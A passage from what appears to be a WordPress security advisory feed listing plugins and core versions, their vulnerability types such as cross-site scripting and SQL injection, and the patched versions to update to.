Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Simple 301 Redirects By BetterLinks – Easy Redirect Manager for WP, 404 Error Log & More

Vulnerability: Missing Authorization via clicked
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Social Sharing Plugin – Sassy Social Share

Vulnerability: Object Injection
Patched Version: 3.3.24
Recommended Action: Update to version 3.3.24, or a newer patched version

Plugin: Page Security & Membership

Plugin: Clock In Portal- Staff & Attendance Management

Vulnerability: Cross-Site Request Forgery To Holiday Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: URL Shortify – Simple, Powerful and Easy URL Shortener Plugin For WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.9.1
Recommended Action: Update to version 1.7.9.1, or a newer patched version

Plugin: Emag Marketplace Connector

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: SiteSuperCharger

Vulnerability: Unauthenticated SQL Injection
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: SVG Support

Vulnerability: 2.5.1
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery via wp-trackback.php
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: Easy2Map

Vulnerability: SQL Injection
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: WP Design Maps & Places

Plugin: W3 Total Cache

Vulnerability: Authenticated Arbitrary File Download
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Subscriber+) Information Disclosure via ‘mf_payment_status’ shortcode
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: DrawIt (draw.io)

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 5.0.07
Recommended Action: Update to version 5.0.07, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Blind SQL Injection
Patched Version: 1.5.7
Recommended Action: Update to one of the following versions, or a newer patched version: 1.5.7, 1.6.4, 1.7.4

Plugin: WP Remote Upload

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: WP Mail Logging

Vulnerability: Missing Authorization to Notice Dismissal
Patched Version: 1.12.0
Recommended Action: Update to version 1.12.0, or a newer patched version

Plugin: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: 5.4.3
Recommended Action: Update to version 5.4.3, or a newer patched version

Plugin: CRM Perks Forms – WordPress Form Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Missing Authorization Checks leading to Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: WP Responsive Tabs horizontal vertical and accordion Tabs

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.16
Recommended Action: Update to version 1.1.16, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: IP Spoofing to Protection Mechanism Bypass
Patched Version: 5.0.8
Recommended Action: Update to version 5.0.8, or a newer patched version

Plugin: Activity Reactions For Buddypress

Plugin: Post Slider

Plugin: WP Libre Form 2

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Missing Authorization in migrateCommonToProductOnly function
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: WP-DBManager

Vulnerability: OS Command Injection
Patched Version: 2.72
Recommended Action: Update to version 2.72, or a newer patched version

Plugin: DNUI

Vulnerability: Cross-Site Request Forgery leading to Unused Image Deletion and Database Image Access
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Tweet

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Category SEO Meta Tags

Vulnerability: Cross-Site Request Forgery via csmt_admin_options
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Cross-Site Scripting
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: WPML

Vulnerability: Missing Authorization to Settings Change
Patched Version: 4.5.11
Recommended Action: Update to version 4.5.11, or a newer patched version

Plugin: Site Reviews

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 6.6.0
Recommended Action: Update to version 6.6.0, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘selectAll’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: FluentCRM – Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution

Vulnerability: Marketing Automation For WordPress <= 2.8.01
Patched Version: 2.8.02
Recommended Action: Update to version 2.8.02, or a newer patched version

Plugin: PrivateContent

Vulnerability: Protection Mechanism Bypass
Patched Version: 8.4.4
Recommended Action: Update to version 8.4.4, or a newer patched version

Plugin: SALESmanago

Vulnerability: Log Injection via Weak Authentication Token
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: WC Vendors – WooCommerce Multivendor, WooCommerce Marketplace, Product Vendors

Vulnerability: Authenticated (Contributor+) Stored Cross-Sites Scripting via Shortcode
Patched Version: 2.4.5
Recommended Action: Update to version 2.4.5, or a newer patched version

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: IP Address Spoofing
Patched Version: 2.8.8
Recommended Action: Update to version 2.8.8, or a newer patched version

Plugin: Maps Widget for Google Maps

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.25
Recommended Action: Update to version 4.25, or a newer patched version

Plugin: YARPP – Yet Another Related Posts Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.30.3
Recommended Action: Update to version 5.30.3, or a newer patched version

Plugin: P3 (Plugin Performance Profiler)

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.3.9
Recommended Action: Update to version 1.5.3.9, or a newer patched version

Plugin: Sender by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Show-Hide / Collapse-Expand

Vulnerability: Missing Authorization
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Insecure Password Reset Mechanism
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: 0mk Shortener

Plugin: Gravity Forms Google Sheet Connector

Vulnerability: Cross-Site Request Forgery via verify_code_integation_new
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: HT Menu – WordPress Mega Menu Builder for Elementor

Vulnerability: Cross-Site Request Forgery via plugin_activation
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.7
Recommended Action: Update to version 3.4.7, or a newer patched version

Plugin: Transposh WordPress Translation

Vulnerability: Authenticated (Admin+) SQL Injection via ‘tp_editor’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Events Made Easy

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6.21
Recommended Action: Update to version 1.6.21, or a newer patched version

Plugin: Cryptocurrency Widgets – Price Ticker & Coins List

Vulnerability: Missing Authorization
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: WPB Show Core

Vulnerability: Unauthenticated Server Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HTML5 Maps

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.5.7
Recommended Action: Update to version 1.6.5.7, or a newer patched version

Plugin: ActiveCampaign – Forms, Site Tracking, Live Chat

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.0.2
Recommended Action: Update to version 8.0.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated (Administrator+) PHP Objection Injection
Patched Version: 3.6.13
Recommended Action: Update to version 3.6.13, or a newer patched version

Plugin: WP Fountain

Plugin: CP Image Store with Slideshow

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.0.68
Recommended Action: Update to version 1.0.68, or a newer patched version

Plugin: Image Tag Manager

Vulnerability: Reflected Cross-Site Scripting via default_class
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Appointment Bookings for Zoom GoogleMeet and more – Wappointment

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Print-O-Matic

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: OneLogin SAML SSO

Vulnerability: Open Redirection
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: DoLogin Security

Vulnerability: IP Address Spoofing
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: WP-Invoice – Web Invoice and Billing

Vulnerability: Privilege Escalation
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Notice Bar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.1.1
Recommended Action: Update to version 3.1.1, or a newer patched version

Plugin: Simple JWT Login – Allows you to use JWT on REST endpoints.

Vulnerability: Insecure Password Creation
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: MasterStudy LMS WordPress Plugin – for Online Courses and Education

Vulnerability: Privilege Escalation
Patched Version: 3.0.18
Recommended Action: Update to version 3.0.18, or a newer patched version

Plugin: AccessPress Social Icons

Vulnerability: Backdoor
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: mTouch Quiz

Vulnerability: SQL Injection
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Authenticated (Subscriber+) Sensitive Information Disclosure
Patched Version: 7.4.4
Recommended Action: Update to version 7.4.4, or a newer patched version

Plugin: WPQA – Builder forms Addon For WordPress

Vulnerability: Builder forms Addon For WordPress < 5.2
Patched Version: 5.2
Recommended Action: Update to version 5.2, or a newer patched version

Plugin: Album and Image Gallery plus Lightbox

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: WP Athletics

Plugin: WP Fastest Cache

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 0.8.3.5
Recommended Action: Update to version 0.8.3.5, or a newer patched version

Plugin: Options for Twenty Seventeen

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: TS Poll – Survey, Versus Poll, Image Poll, Video Poll

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: HT Builder – WordPress Theme Builder for Elementor

Vulnerability: Cross-Site Request Forgery via plugin_activation
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Code Injection
Patched Version: 3.0.34.2
Recommended Action: Update to one of the following versions, or a newer patched version: 3.0.34.2, 3.1.10, 3.2.28, 3.3.21.4, 3.4.34.2, 3.5.8.4, 3.6.11

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.5.7.1
Recommended Action: Update to version 5.5.7.1, or a newer patched version

Plugin: Responsive Vertical Icon Menu

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Embed Swagger

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Missing Authorization to Arbitrary Page/Post Deletion
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: Premium Addons Pro for Elementor

Vulnerability: Missing Authorization
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: Product Gallery Slider, Additional Variation Images for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: membermouse

Vulnerability: Blind SQL Injection
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: Themify Portfolio Post

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Slideshow

Vulnerability: 2.2.21
Patched Version: 2.2.22
Recommended Action: Update to version 2.2.22, or a newer patched version

Plugin: BxSlider WP

Plugin: Free Live Chat Support

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: Roomcloud

Vulnerability: Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation

Vulnerability: Authenticated (Subscriber+) Sensitive Information Disclosure via Shortcode
Patched Version: 2.12.2
Recommended Action: Update to version 2.12.2, or a newer patched version

Plugin: Analyticator

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 6.5.6
Recommended Action: Update to version 6.5.6, or a newer patched version

Plugin: Asset CleanUp: Page Speed Booster

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.6.7
Recommended Action: Update to version 1.3.6.7, or a newer patched version

Plugin: Chatbot for WordPress by Collect.chat ⚡️

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Gallery Images Ape

Vulnerability: Authenticated Plugin Deactivation
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Post Content XMLRPC

Plugin: Sniplets

Vulnerability: Remote Code Execution
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Contact Form 7 Widget For Elementor Page Builder & Gutenberg Blocks

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: wpslacksync

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Unauthenticated MailChimp API Key Disclosure
Patched Version: 5.8.2
Recommended Action: Update to version 5.8.2, or a newer patched version

Plugin: Perfect Survey

Plugin: External url as post Featured Image (thumbnail)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.03
Recommended Action: Update to version 2.03, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Multiple Reflected Cross-Site Scripting
Patched Version: 2.9.52
Recommended Action: Update to version 2.9.52, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.0.21
Recommended Action: Update to version 2.0.21, or a newer patched version

Plugin: CMP – Coming Soon & Maintenance Plugin by NiteoThemes

Vulnerability: Information Exposure
Patched Version: 4.1.7
Recommended Action: Update to version 4.1.7, or a newer patched version

Plugin: VK Blocks Pro

Vulnerability: Stored (Contributor+) Cross-Site Scripting in Tag Edit
Patched Version: 1.54.0
Recommended Action: Update to version 1.54.0, or a newer patched version

Plugin: WP Scrippets

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Cross-Site Request Forgery via update_rating
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Export Post Info

Vulnerability: Authenticated (Author+) CSV Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: User Meta Manager

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: WP-Invoice – Web Invoice and Billing

Vulnerability: Missing Authorization
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Print, PDF, Email by PrintFriendly

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: 5.5.2
Recommended Action: Update to version 5.5.2, or a newer patched version

Plugin: OnePress Social Locker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2.5
Recommended Action: Update to version 4.2.5, or a newer patched version

Plugin: Better Search – Relevant search results for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.5
Recommended Action: Update to version 1.3.5, or a newer patched version

Plugin: Category List Portfolio Page

Plugin: Contact Us all-in-one button

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.8
Recommended Action: Update to version 1.8.8, or a newer patched version

Plugin: Coming soon and Maintenance mode

Vulnerability: Missing Authorization to Arbitrary Email Send
Patched Version: 3.6.7
Recommended Action: Update to version 3.6.7, or a newer patched version

Plugin: WP All Backup

Vulnerability: Cross-Site Request Forgery to Backup Storage Modification
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Similar Posts – Best Related Posts Plugin for WordPress

Vulnerability: Admin+ Arbitrary PHP Code Execution
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Notification – Custom Notifications and Alerts for WordPress

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 8.0.0
Recommended Action: Update to version 8.0.0, or a newer patched version

Plugin: Custom Product Tabs for WooCommerce

Vulnerability: Subscriber+ Settings Update
Patched Version: 1.7.8
Recommended Action: Update to version 1.7.8, or a newer patched version

Plugin: Cab Grid

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: SecureMoz Security Audit

Plugin: Post List Designer by Category – List Category Post Or Recent Post

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scriptiong via Shortcode
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: WooDiscuz – WooCommerce Comments

Plugin: Strong Testimonials

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.11
Recommended Action: Update to version 3.1.11, or a newer patched version

Plugin: Safe Editor

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: GD Rating System

Vulnerability: Directory Traversal
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: PrettyLinks – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Plugin: WP eCommerce Shop Styling

Vulnerability: Remote File Inclusion
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Call&Book Mobile Bar

Plugin: WPS Hide Login

Vulnerability: Hidden Login Page Location Disclosure
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Sliced Invoices – WordPress Invoice Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: Poll, Survey & Quiz Maker Plugin by Opinion Stage

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 19.6.25
Recommended Action: Update to version 19.6.25, or a newer patched version

Plugin: Easy Digital Downloads – Cross-Sell and Upsell

Vulnerability: Cross-Sell and Upsell <= 1.1.2
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: MomentoPress for Momento360

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: No subtitle
Patched Version: 4.13.2
Recommended Action: Update to version 4.13.2, or a newer patched version

Plugin: WooCommerce

Vulnerability: Stored Cross-Site Scripting via REST-API
Patched Version: 2.6.4
Recommended Action: Update to version 2.6.4, or a newer patched version

Plugin: Login Widget With Shortcode

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: AGCA – Custom Dashboard & Login Page

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.5.5
Recommended Action: Update to version 6.5.5, or a newer patched version

Plugin: WP-UserOnline

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.88.3
Recommended Action: Update to version 2.88.3, or a newer patched version

Plugin: Phlox Shop

Plugin: Apollo13 Framework Extensions

Vulnerability: Missing Authorization
Patched Version: 1.9.0
Recommended Action: Update to version 1.9.0, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.4.5
Recommended Action: Update to version 7.4.5, or a newer patched version

Plugin: Web Push Notifications – Webpushr

Vulnerability: Cross-Site Request Forgery to Local File Inclusion via menu
Patched Version: 4.35.0
Recommended Action: Update to version 4.35.0, or a newer patched version

Plugin: Widget Settings Importer/Exporter

Vulnerability: Unauthorized Widget Import to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Analyticator

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 6.5.6
Recommended Action: Update to version 6.5.6, or a newer patched version

Plugin: OWM Weather

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 5.6.9
Recommended Action: Update to version 5.6.9, or a newer patched version

Plugin: WooSidebars

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Add User Role

Plugin: Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection

Vulnerability: Unauthenticated SQL Injection
Patched Version: 6.67
Recommended Action: Update to version 6.67, or a newer patched version

Plugin: Twittee Text Tweet

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Stored Cross-Site scripting
Patched Version: 2.0.32
Recommended Action: Update to version 2.0.32, or a newer patched version

Plugin: One User Avatar | User Profile Picture

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: YITH Easy Login & Register Popup for WooCommerce

Vulnerability: Authentication Bypass via Password Reset
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Name Directory

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.18
Recommended Action: Update to version 1.18, or a newer patched version

Plugin: Advanced Category Template

Vulnerability: Stored Cross-Site Scripting via Cross-Site Request Forgery in _form.php
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SEO SearchTerms Tagging 2

Plugin: LiteSpeed Cache

Vulnerability: Missing Authorization to Toggle Crawler State
Patched Version: 5.3.1
Recommended Action: Update to version 5.3.1, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: PHP Object Injection
Patched Version: 4.02.01
Recommended Action: Update to version 4.02.01, or a newer patched version

Plugin: Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 1.0.73
Recommended Action: Update to version 1.0.73, or a newer patched version

Plugin: Albo Pretorio On line

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6.4
Recommended Action: Update to version 4.6.4, or a newer patched version

Plugin: WP All Import Pro

Vulnerability: Missing Authorization Checks
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Cross-Site Request Forgery to Google Drive Storage Update
Patched Version: 1.23.11
Recommended Action: Update to version 1.23.11, or a newer patched version

Plugin: Client Logo Carousel

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: WP-ShowHide

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.05
Recommended Action: Update to version 1.05, or a newer patched version

Plugin: Strong Testimonials

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Jetpack CRM – Clients, Leads, Invoices, Billing, Email Marketing, & Automation

Vulnerability: Authenticated (Client+) Stored Cross-Site Scripting
Patched Version: 5.5.1
Recommended Action: Update to version 5.5.1, or a newer patched version

Plugin: WP24 Domain Check

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.3
Recommended Action: Update to version 1.6.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.18
Recommended Action: Update to version 2.0.18, or a newer patched version

Plugin: WooPayments: Integrated WooCommerce Payments

Vulnerability: Authenticated (Shop manager+) SQL Injection via currency parameters
Patched Version: 5.9.1
Recommended Action: Update to version 5.9.1, or a newer patched version

Plugin: Zengo Custom Thumbnail Image Gallery

Plugin: Visual Portfolio, Photo Gallery & Post Grid

Vulnerability: Unauthenticated CSS Injection
Patched Version: 2.18.0
Recommended Action: Update to version 2.18.0, or a newer patched version

Plugin: WP Activity Log

Vulnerability: Cross-Site Request Forgery via ajax_run_cleanup
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: WooCommerce Conversion Tracking

Vulnerability: Cross-Site Request Forgery and Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Image/Banner Widget

Plugin: Shortcodes by Angie Makes

Plugin: Eazy Plugin Manager – Powerful Plugin Management Solution for WordPress

Vulnerability: Missing Authorization via update_options
Patched Version: 4.1.3
Recommended Action: Update to version 4.1.3, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Cross-Site Request Forgery on Settings
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: YouTube Video Gallery by YouTube Showcase – Video Gallery Plugin for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.6
